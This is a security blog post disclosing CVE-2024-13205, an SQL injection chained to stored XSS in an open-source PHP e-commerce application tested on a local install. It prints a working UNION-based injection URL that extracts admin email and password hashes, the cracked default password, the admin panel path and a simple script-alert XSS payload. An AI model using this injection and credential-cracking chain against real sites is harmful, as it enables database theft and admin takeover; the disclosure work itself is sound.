Header Ads Widget

Responsive Advertisement

(CVE-2024-13205)-SQL-Injection-To-XSS-In-Ecommerce-PHP-kurniaramadhan-1.0

Web Security Insights By Maloy Roy Orko December 23, 2024
Hi All, 

I am Maloy Roy Orko.
Recently in one of my pentest research, I found an E-commerce PHP application By kurniaramadhan which is an open source E-commerce application using native PHP.

It is based on the scripting languages of PHP. E-commerce PHP is an e-commerce application developed using the native PHP programming language. Some of the technology stacks used in this application are.

Curious to explore its functionalities, I downloaded and set it up in my local system. 

After fiddling with the source code, I found that it did not have any kind of SQL Injection protection.

It can lead into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.

Even The Hackers Can easily store malicious JavaScript code simply from the admin panel as he can get the admin credentials by exploiting SQL Injection Vulnerability.

However,Any Attacker Can Easily Trigger Their Malicious Interests By Exploiting CSRF Vulnerability And Giving Malicious Links To The Users And Admins And Their Account Can Be Hampered In Both Users And Admin Account Case.Attacker Can Force Them To Do Anything As There Were No CSRF Protection.

But In This Blog I Will Discuss About SQL Injection To XSS Vulnerability Only. You Can Read About That CSRF Vulnerability Here.

The Main Thing Is,if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too.Thats why I am trying to inform everyone about this.

  • Title of the Vulnerability:                    SQL Injection to XSS
  • Vulnerability Class:                                  SQL Injection & XSS
  • Product Name: E-Commerce-PHP 
  • Vendor: https://github.com/kurniaramadhan/
  • Vulnerable Product Link: https://github.com/kurniaramadhan/E-Commerce-PHP
  • Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.Even The Hackers Can easily store malicious JavaScript code simply from the admin panel as he can get the admin credentials by exploiting SQL Injection Vulnerability.

  • Product & Service Introduction: Ecommerce-PHP-kurniaramadhan-1.0
Observation & Exploitation: 

  1. Let's see the source code?       

  2. You can see that there is no defense or filter against SQL Injection.Normally They are getting IDS and then fetching data From Database According to it.
  3. So Lets See ,How I exploited It? What is the exploitable parameter here?
  4. Actually,All the parameters of this website is VULNERABLE.
  5. Lets Take One Parameter As a example and then see the exploit use here!
  6. Vulnerable Place :
  7. http://192.168.1.100:8080/blog-details.php?blog_id=1+Malicious SQL Exploits
  8. So,Lets see an approach and the result?


  10. My Exploit For This Admin Credential Enumeration Was:
  11. http://192.168.1.100:8080/blog-details.php?blog_id=1+union+select+concat(admin_email,0x3a,0x3c62723e3c62723e3c2f623e41646d696e2050617373776f72643a3c2f623e,0x3c62723e,admin_password),2,3,4,5,6,7,8,9+from+admins--+
  12. Maybe 😏 you are thinking that as the admin password is encrypted,We can't login to admin panel? 😁
  13. You are wrong.
  14. I decrypted it from a decryption website.Lets see the result till logging in for XSS Injection.

  15. So,Now we have Everything To Login.Even the admin panel path is also a known one!IT is /admin/
  16. Admin Email: admin@gmail.com
  17. Encrypted Admin Password: 0287040c474dbf44cdeb17eebb99d828
  18. Decrypted Admin Password: admin1234567
  19. Lets Login .......! 😁 

  21. Login Successful.Now Lets Chain XSS.
  22. Here we will simply create a product by going in this link: http://192.168.0.100:8080/admin/create_product.php
  23. Lets fill the boxes with XSS Payloads and see what happens? 😏🤝
  24. XSS Payload: <script>alert("Vulnerability Found By Maloy Roy Orko");</script>


  26. Lets, see the index page now 😁 


  28. Guess What ? 😎😎 We found XSS 🤝
Video POC for SQL INJECTION to XSS :-  


Conclusion :- 

The main aim of this article is to show that if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent. 

Post a Comment

0 Comments